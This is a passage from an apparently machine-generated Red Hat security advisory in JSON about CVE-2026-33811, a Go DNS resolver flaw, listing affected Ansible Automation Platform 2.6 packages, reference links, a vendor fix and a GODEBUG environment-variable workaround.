"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debuginfo-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-debugsource-0:12.3.0-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pulpcore-0:3.49.66-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pyasn1-0:0.6.4-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el9ap.noarch"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-33811"
},
{
"category": "external",
"summary": "RHBZ#2467822",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2467822"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-33811",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-33811"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-33811",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33811"
},
{
"category": "external",
"summary": "https://go.dev/cl/767860",
"url": "https://go.dev/cl/767860"
},
{
"category": "external",
"summary": "https://go.dev/issue/78803",
"url": "https://go.dev/issue/78803"
},
{
"category": "external",
"summary": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M",
"url": "https://groups.google.com/g/golang-announce/c/qcCIEXso47M"
},
{
"category": "external",
"summary": "https://pkg.go.dev/vuln/GO-2026-4981",
"url": "https://pkg.go.dev/vuln/GO-2026-4981"
}
],
"release_date": "2026-05-07T19:41:19.285000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-08-04T18:56:41+00:00",
"details": "For details on how to apply this update, refer to Ansible Automation Platform documentation.",
"product_ids": [
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:50336"
},
{
"category": "workaround",
"details": "To mitigate this issue, applications can be configured to use the pure Go DNS resolver instead of the `cgo` DNS resolver. This can be achieved by setting the `GODEBUG` environment variable to `netdns=go`. For example, to run a Go application with this mitigation: `GODEBUG=netdns=go /path/to/your/go/application`. This change may require restarting affected applications or services to take effect. Users should verify that this change does not negatively impact DNS resolution for their specific application environment.",
"product_ids": [
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python-tox-ansible-0:26.7.1-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:python3-tox-ansible-0:26.7.1-1.el10ap.noarch",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.src",
"10Base-Ansible-Automation-Platform-2.6:receptor-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debuginfo-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.aarch64",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.ppc64le",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.s390x",
"10Base-Ansible-Automation-Platform-2.6:receptor-debugsource-0:1.6.7-1.el10ap.x86_64",
"10Base-Ansible-Automation-Platform-2.6:receptorctl-0:1.6.7-1.el10ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:python3.12-tox-ansible-0:26.7.1-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Developer-1.3:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptor-0:1.6.7-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6-Inside-1.4:receptorctl-0:1.6.7-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:aap-metrics-utility-0:0.7.6-3.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools+server-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:ansible-dev-tools-0:26.7.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-cli-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-server-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-ui-0:4.7.15-2.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-controller-venv-tower-0:4.7.15-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-0:1.2.11-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-base-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-event-stream-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-eda-controller-worker-services-0:1.2.11-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-config-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-debugsource-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-proxy-server-debuginfo-0:2.6.17-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:automation-gateway-server-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-hub-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:automation-platform-ui-0:2.6.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debuginfo-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-aiohttp-debugsource-0:3.14.1-2.el9ap.x86_64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-daphne-0:4.2.2-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+activitystream-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+api_documentation-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+authentication-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+channel_auth-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+feature_flags-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+jwt_consumer-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+oauth2_provider-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rbac-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+redis_client-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+resource_registry-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base+rest_filters-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-django-ansible-base-0:2.6.20260804-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.noarch",
"9Base-Ansible-Automation-Platform-2.6:python3.12-galaxy-ng-0:4.11.12-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.aarch64",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.ppc64le",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.s390x",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.src",
"9Base-Ansible-Automation-Platform-2.6:python3.12-pillow-0:12.3.0-1.el9ap.x86_64",
